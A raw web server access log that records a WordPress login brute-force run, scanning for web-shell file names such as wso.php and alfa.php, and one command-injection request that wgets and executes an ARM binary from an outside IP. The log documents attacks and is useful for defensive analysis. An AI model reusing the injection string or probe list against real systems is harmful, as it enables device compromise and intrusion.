160.30.137.9 - - [29/Dec/2025:22:37:01 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:01 +0300] "GET /css/autoload_classmap.php HTTP/1.1" 301 162 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:02 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:02 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:02 +0300] "GET /css/autoload_classmap.php HTTP/1.1" 404 47066 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:02 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:02 +0300] "GET /cyber.php HTTP/1.1" 301 162 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:02 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:03 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:03 +0300] "GET /cyber.php HTTP/1.1" 404 47066 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:03 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:03 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:03 +0300] "GET /d.php HTTP/1.1" 301 162 "https://www.google.fr/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:04 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:04 +0300] "GET /d.php HTTP/1.1" 404 47066 "https://www.google.fr/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:04 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:04 +0300] "GET /defaults.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:04 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:05 +0300] "GET /defaults.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:05 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:05 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:05 +0300] "GET /edit.php HTTP/1.1" 301 162 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:05 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:05 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:06 +0300] "GET /edit.php HTTP/1.1" 404 47066 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:06 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:06 +0300] "GET /fx.php HTTP/1.1" 301 162 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:06 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:06 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0"
4.190.186.103 - - [29/Dec/2025:22:37:06 +0300] "GET /fx.php HTTP/1.1" 404 47066 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:07 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0"
4.190.186.103 - - [29/Dec/2025:22:37:07 +0300] "GET /h.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:07 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0"
4.190.186.103 - - [29/Dec/2025:22:37:07 +0300] "GET /h.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:07 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0"
160.30.137.9 - - [29/Dec/2025:22:37:07 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:07 +0300] "GET /image/c.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:07 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:08 +0300] "GET /image/c.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:08 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:08 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:08 +0300] "GET /images/alfa.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:08 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:120.0) Gecko/20100101 Firefox/120.0"
160.30.137.9 - - [29/Dec/2025:22:37:09 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:09 +0300] "GET /images/alfa.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:09 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
204.76.203.8 - - [29/Dec/2025:22:37:09 +0300] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20/tmp;wget%20http://45.153.34.205:64004/timeless/arm7;chmod%20777%20arm7;./arm7%20tbk HTTP/1.1" 301 162 "-" "Mozila/5.0"
4.190.186.103 - - [29/Dec/2025:22:37:09 +0300] "GET /images/install.php HTTP/1.1" 301 162 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:09 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:09 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0"
4.190.186.103 - - [29/Dec/2025:22:37:09 +0300] "GET /images/install.php HTTP/1.1" 404 47066 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:09 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:10 +0300] "GET /images/wso.php HTTP/1.1" 301 162 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:10 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:10 +0300] "GET /images/wso.php HTTP/1.1" 404 47066 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:10 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:10 +0300] "GET /images/xmrlpc.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:10 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0"
160.30.137.9 - - [29/Dec/2025:22:37:10 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:118.0) Gecko/20100101 Firefox/118.0"
4.190.186.103 - - [29/Dec/2025:22:37:11 +0300] "GET /images/xmrlpc.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:11 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:118.0) Gecko/20100101 Firefox/118.0"
160.30.137.9 - - [29/Dec/2025:22:37:11 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:118.0) Gecko/20100101 Firefox/118.0"
4.190.186.103 - - [29/Dec/2025:22:37:11 +0300] "GET /index2.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:11 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0"
160.30.137.9 - - [29/Dec/2025:22:37:11 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:11 +0300] "GET /index2.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:12 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:12 +0300] "GET /install.php HTTP/1.1" 301 162 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:12 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:12 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:12 +0300] "GET /install.php HTTP/1.1" 404 47066 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:12 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:13 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:13 +0300] "GET /luuf.php HTTP/1.1" 301 162 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:13 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
4.190.186.103 - - [29/Dec/2025:22:37:13 +0300] "GET /luuf.php HTTP/1.1" 404 47066 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:13 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:13 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:14 +0300] "GET /mah.php HTTP/1.1" 301 162 "https://www.bing.com/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:14 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:14 +0300] "GET /mah.php HTTP/1.1" 404 47066 "https://www.bing.com/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:14 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:14 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0"
4.190.186.103 - - [29/Dec/2025:22:37:14 +0300] "GET /mm.php HTTP/1.1" 301 162 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:14 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:15 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:15 +0300] "GET /mm.php HTTP/1.1" 404 47066 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:15 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:15 +0300] "GET /new.php HTTP/1.1" 301 162 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:15 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:15 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0"
4.190.186.103 - - [29/Dec/2025:22:37:16 +0300] "GET /new.php HTTP/1.1" 404 47066 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:16 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0"
4.190.186.103 - - [29/Dec/2025:22:37:16 +0300] "GET /php.php HTTP/1.1" 301 162 "https://www.google.de/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:16 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0"
160.30.137.9 - - [29/Dec/2025:22:37:16 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:16 +0300] "GET /php.php HTTP/1.1" 404 47066 "https://www.google.de/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
